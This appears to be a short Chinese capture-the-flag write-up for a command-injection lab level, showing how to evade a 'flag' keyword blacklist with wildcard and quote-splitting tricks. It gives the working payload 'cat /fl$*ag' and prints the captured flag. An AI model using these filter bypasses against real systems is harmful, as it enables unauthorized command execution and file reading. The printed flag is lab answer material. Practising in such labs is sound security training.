HelloCTF [RCE-labs] Level 5 - 黑名单式过滤

开启靶场,打开链接:

GET传参cmd,且对flag字符串进行了过滤

\*绕过,fl*ag

用'绕过,f''lag或f'l'ag

当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)


/?cmd=cat /fl$*ag

成功得到flag:

NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}

相关推荐
Johny_Zhao6 分钟前
Vmware workstation安装部署微软SCCM服务系统
网络·人工智能·python·sql·网络安全·信息安全·微软·云计算·shell·系统运维·sccm
阿斯顿法国红酒快1 小时前
Windows系统安全加固
网络·windows·安全·网络安全·系统安全·ddos
一口一个橘子2 小时前
[ctfshow web入门] web118
前端·web安全·网络安全
kp000003 小时前
PHP弱类型安全漏洞解析与防范指南
android·开发语言·安全·web安全·php·漏洞
Hello.Reader5 小时前
EDR与XDR如何选择适合您的网络安全解决方案
安全·web安全
AIGC方案5 小时前
2025 AI如何重构网络安全产品
人工智能·web安全·重构
谈不譚网安5 小时前
Cross-Site Scripting(XSS)
安全·web安全·xss
Q_Q19632884756 小时前
python的漫画网站管理系统
开发语言·spring boot·python·django·flask·node.js·php
SRC_BLUE_178 小时前
VulnHub | Breach - 1
开发语言·php·dreamweaver
神经毒素16 小时前
WEB安全--Java安全--shiro721反序列化漏洞
安全·web安全